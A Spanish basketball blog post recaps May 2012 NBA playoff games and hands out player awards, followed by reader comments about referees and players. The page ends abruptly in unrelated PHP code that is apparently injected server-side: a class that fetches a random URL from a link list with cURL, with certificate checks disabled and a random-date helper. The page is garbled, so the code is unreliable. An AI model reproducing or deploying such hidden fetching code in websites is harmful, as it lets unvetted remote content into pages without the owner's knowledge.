La crónica: Llueve un poquito menos

19 de May de 2012 por TheDeerHunter

Extraordinaria sesión de playoffs, la de anoche. Máxima tensión, piques, polémicas, gradas enloquecidas… El sabor del “a vida o muerte” en cada posesión que tanto nos fascina con ración extra. El momento de los grandes. Estaba en juego nada menos que dejar dos eliminatorias esencialmente sentenciadas.

Tras la exhibición del otro día los Celtics comenzaban en plan paseo en barca. Los Sixers tardaban en anotar su primera canasta casi cuatro minutos y para entonces perdían 2-14. El primer cuarto iban a terminar doblando (12-24) y hasta la mitad llegarían a acumular una ventaja de 18 puntos. Hay que decir que cuando se ponen es maravilloso ver a los Celtics en ataque y en defensa. Nivel objetivamente de campeones. Su problema, quizás, es que ya no pueden mantener ese ritmo tanto tiempo.

Cuando los Sixers y el público estaban casi entregados resurgió la mayor virtud de este equipo, su segunda unidad. Extraordinaria reacción de Louis Williams tras unos playoffs tan decepcionantes, bien ayudado por Thaddeus, Meeks y el rookie Lavoy Allen. Conforme iban acortando puntos a base de arreones de casta el respetable se lo comenzaba a creer. Afición animosa la de Philadelphia, capaz de hacer mella hasta en el férreo orgullo verde. Los Celtics comenzaron a cometer errores impropios, en forma de pérdidas y segundas opciones. Además de los problemas de Rondo con las faltas se dieron cuenta que no eran capaces de resistir el empuje de rivales y grada. La cuestión era si habría margen para ir administrando la ventaja mordiendo aquí y allá como ellos saben.

No pensemos que los 61 puntos que anotan los Sixers en la segunda parte son producto de baloncesto exquisito e indefendible. Nada de eso. Arrojo puro y bastante caos, pero a los Celtics no les llegaba la camisa al cuello en ataque. Aún estarían por encima a 4’50” del final con triple de Ray Allen y mantendrían la igualdad casi hasta el último momento. Es en ese punto cuando dos acciones exquisitas de Iguodala, a pesar de no ser un  jugador que se prodige especialmente en el clutch, desnivelaban definitivamente el choque . La serie vuelve para Boston con el empate a 2. (83-92)

Los Lakers también empezaban fuertes pero la superioridad les duró más o menos medio cuarto. Pronto empezaron los problemas de faltas para Kobe, mantenido con muchos riesgos por Brown, por cierto, y a sufrir de lo lindo todo el choque luchando casi por no ir de cabeza a la barrida. Partido muy tenso y polémico, marcado por un finísimo criterio arbitral por fuera (70 tiros libres lanzados) pero con barra libre en las zonas. Uno de esos días,excesivamente frecuentes en postemporada, en los que sale más a cuenta tener un Perkins que un Gasol. También hubo lío entre ex-Artest y, en este caso, Westbrook por un quítame allá esa rodilla de encima.

Alguno verá por encima algún resumen y algún box-score y pensará “otro de esos partidos chupones suyos”. Nada de eso. Actuación vital de Kobe sólo al alcance de los más grandes. Aguantando su casillero de faltas de manera casi temeraria y peleando contra un inmenso abanico de variantes defensivas, en algunas fases menos legales que en otras. También soportando en sus espaldas la responsabilidad que a otros les cuesta asumir.

Enfrente la tríada letal de Thunder. No hablo del “letal” de Perkins, aprendiz de jugador de NFL, que es el único hombre del planeta capaz de hacer 5 faltas en una misma jugada, que le perdonen cuatro y que proteste la que le señalan. Hablamos de Durant, Harden y Westbrook (por este orden anoche). Muchos también creerán que Artest estaba de vacaciones por el acierto de Durant. Aunque os parezca mentira su defensa fue decisiva.

¿Diferencias con la anterior derrota? Quizás que Blake estuvo brillante y Sessions bastante bien. Ni Pau ni Bynum tuvieron su día más dulce, pero al final aportaron y, lo que es más importante, siguen vivos. Primera derrota de estos Thunder en postemporada. En muchos instantes pocos hubieran dado un duro por ello. (96-99)

PREMIOS

MVP: Thaddeus Young y Lou Williams han sido el factor diferencial de los Sixers durante gran parte de la temporada. Anoche sumaron 27 puntos, 13 rebotes y 11 asistencias para igualar la serie contra los Celtics. Premio para Kobe Bryant que acabó el partido con 36 puntos, 7 rebotes, 6 asistencias y un descomunal 18 de 18 en tiros libres.

Rookie: Lavoy Allen se ha hecho un hueco definitivo en los Sixers. Sus 8 puntos, 10 rebotes, 2 robos y un tapón ya son casi habituales.

Sorpresa: No es nada habitual ver a un equipo acabar con un 41 de 42 en tiros libres. Anoche lo consiguieron los Lakers y fue vital para ganar el partido. También destacamos los 12 puntos y 8 rebotes de Steve Blake.

Decepción: Flojo partido de Kevin Garnett, el primero en todos estos playoffs. No es que 9 puntos, 11 rebotes, 2 asistencias, 2 robos y 3 tapones sea poca aportación, pero si le sumamos un 3 de 12 en tiro, 7 pérdidas y lo comparamos con el nivel que venía ofreciendo le da para llevarse nuestro premio.

Esfuerzo en vano: Rajon Rondo y Paul Pierce dieron lo mejor de si mismos, el base con 15 puntos y 15 asistencias, y el capitán con 24 puntos y 6 rebotes. El trio estelar formado por Durant, Westbrook y Harden sumó nada menos que 73 puntos y 24 rebotes, pero no fue suficiente para tumbar a los Lakers.

Comenta

19 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Hostia, qué bueno lo de Artest vs Westbrook. Artest es como lo que decía Otto Von Bismarck: quiere la paz, pero se prepara para la guerra, jajajaja, menudo individuo. Casquería pura y dura. Lo mejor es la reacción de Joey Crawford a lo mosso d’squadra y cartabón, empujando a Westbrook para que la cosa no fuera a más. +1 JOEY!!

      Citar

  2. Sancho88 dice:
    #2

    Hola, me llamo James Harden, hago pasos en todas mis entradas a canasta y nunca me los pitan. Adiós

      Citar

  3. HisRoyalAirness dice:
    #3

    Pues yo creo que es culpa de Westbrook, le suelta un remazo a la rodilla sin venir a cuento. Niñato. Yo creo que Crawford lo separa para salvarle la vida, que se lo agradezca.
    Secundo lo de Harden, es un escándalo. Y aún encima a veces con el tercer paso saca el “and one”.

    Lo de Perkins es un escándalo, no me gustan nada este tipo de arbitrajes. Lo normal hubiera sido que se fuera por faltas, junto a Ibaka que es menos sutil que un bocata de piedras, y los interiores de Lakers se hubieran merendado el partido. Si los árbitros no hacen su trabajo no pueden demostrar la superioridad en la pintura.
    Yo seguiré diciendo lo de los FT de Pau. Ya no es que meta más puntos es que así saca faltas, no hay que ser muy listos.

    PD: cada vez que veo a Kobe en el poste y hace finta + fadeaway es como estar viendo al mismísimo Mike

      Citar

  4. Esteban dice:
    #4

    lo dije antes de la serie, le seria muy muy dificil a bynum y gasol marcar una gran diferencia en la pintura, el sucio perkins les hara sanfrar cada tiro bajo el aro e ibaka es casi tan alto y mucho mas fuerte q pau

    si hay un juego interior en esta liga capaz de hacer sudar feo a la dupla lakers

    la llegada de perkins el año pasado fue justamente para esta serie, bueno, los lakers de fuieron antes a casa y le sobraron pivots para defender al ultradefensivo chandler en final de conferencia

    ahora si estan aprovechando sus musculos y kilos bajo los aros

      Citar

  5. Pop dice:
    #5

    Esteban: lo dije antes de la serie, le seria muy muy dificil a bynum y gasol marcar una gran diferencia en la pintura, el sucio perkins les hara sanfrar cada tiro bajo el aro e ibaka es casi tan alto y mucho mas fuerte q pausi hay un juego interior en esta liga capaz de hacer sudar feo a la dupla lakersla llegada de perkins el año pasado fue justamente para esta serie, bueno, los lakers de fuieron antes a casa y le sobraron pivots para defender al ultradefensivo chandler en final de conferenciaahora si estan aprovechando sus musculos y kilos bajo los aros

    Pau le saca a Ibaka 7-8 cms.

    Jugadores como Perkins viven de los halagos pseudorománticos que hablan de lucha, entrega, etc. Confundiendo esos términos con la más pura y antideportiva marrullería.

      Citar

  6. MagicJohnson32 dice:
    #6

    Madre mía, qué angustia, qué manera de sufrir, qué tensión durante los 48 minutos por parte de ambos equipos. Hay muchísimas cosas que decir sobre el partido pero ahora mismo estoy agotado. Además, acaba de empezar “La gran evasión” en la Sexta3 😀

    Sancho88:
    Hola, me llamo James Harden, hago pasos en todas mis entradas a canasta y nunca me los pitan. Adiós

    Ostia Sancho, pensaba que era el único que veía pasos en las entradas de Harden. Me quedo más tranquilo.

      Citar

  7. Esteban dice:
    #7

    Pop: Pau le saca a Ibaka 7-8 cms.

    Jugadores como Perkins viven de los halagos pseudorománticos que hablan de lucha, entrega, etc. Confundiendo esos términos con la más pura y antideportiva marrullería.

    tenia entendido q pau mide 2.13 e ubaka 2.08, bah eso dice la page de la nba, pau por lo general le saca mas altura a la mayoria de los ala pivot de la liga, e ibaka es el triple de fuerte y agil q pau, en defensa obvio, cuando no tiene el bzalon en las manos

    si bien perkins me parece un sucio y mal jugador, es muy fuerte y no se le achica a pegarle a nadie, no es mi tipo de jugador preferido, pero es util

      Citar

  8. Sancho88 dice:
    #8

    Pau mide 2,16

      Citar

  9. HisRoyalAirness dice:
    #9

    Es cierto lo que dice Sancho, la altura real de Pau es 2’16. Normalmente cuando miden en pies se pierden centímetros porque se “redondea”, por así decirlo.

    Esteban, si arbitrasen bien los Lakers impondrían su altura porque Perkins se habría marchado en el primer cuarto.
    E ibaka sí, es más ágil que Pau pero el triple de fuerte? Va a ser que no

      Citar

  10. nba dice:
    #10

    Mientras los rivales le sigan poniendo la alfombra roja o autopista a Harden, para que se van a molestar los arbitros en pitar pasos de este.
    Respecto a Ibaka , gracias a la defensa tan pegajosa hacia Gasol, esta dificultando una de las potenciales armas de los Lakers, que es la gran vision de juego de Pau, por lo que Bryant es mas normal que haga los tiros que hace en esta serie.
    Respecto a Perkins, daba miedo en Celtics, reparte de lo lindo , pero ahora con no se cuantos kilos menos, tanto Bynum como Gasol, no tendrían ni para empezar con el

      Citar

  11. Heineken dice:
    #11

    33-11 para los Clippers en el 1º cuarto
    14 puntos de Griffin (7 de 8) y Paul ya con 7 asistencias

      Citar

  12. MagicJohnson32 dice:
    #12

    +10 para Clippers al descanso con 20 puntos y 7 rebotes de Griffin.

      Citar

  13. Sancho88 dice:
    #13

    Dónde se ha escondido el mejor base de la historia? Batapum Tchsssssssssss!!

      Citar

  14. MagicJohnson32 dice:
    #14

    Jojo, 24-4 de parcial en el tercer cuarto, brutal.

      Citar

  15. Sancho88 dice:
    #15

    Parece que Mo Williams es el único que puede cambiar esto… pero difícil lo tienen Clippers. Parecen imbatibles los Spurs, veremos qué pasa en una final durísima contra OKC o Lakers, porque muchas veces equipos que parecen tan inexpugnables acaban por caer

      Citar

  16. MagicJohnson32 dice:
    #16

    Qué escándalo lo de Tony Parker, qué temporada, qué nivel, qué bien juega y hace jugar a este equipo. Alucinante.

      Citar

  17. Viva_Dirk dice:
    #17

    A que hora empieza el OKC-Lakers?

      Citar

  18. MagicJohnson32 dice:
    #18

    Viva_Dirk:
    A que hora empieza el OKC-Lakers?

    A las 4:30. Bueno, ya sabes, dicen 4:30 pero es 4:40 más o menos.

      Citar

  19. simon dice:
    #19

    Madremia!! mi plan para esta noche era ver el Clips-Spurs pero viendo el primer cuarto he dicho bahh! Popovic reserva a sus titulares lo que queda de partido para mañana poner el 3-1 y me he ido convencido de que ganaba Clippers y al llegar veo que han ganado de 10!!! increible… tendré que ver los ultimos 3 cuartos mañana cuando lo repitan… alucino. muy fuertes estos Spurs…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>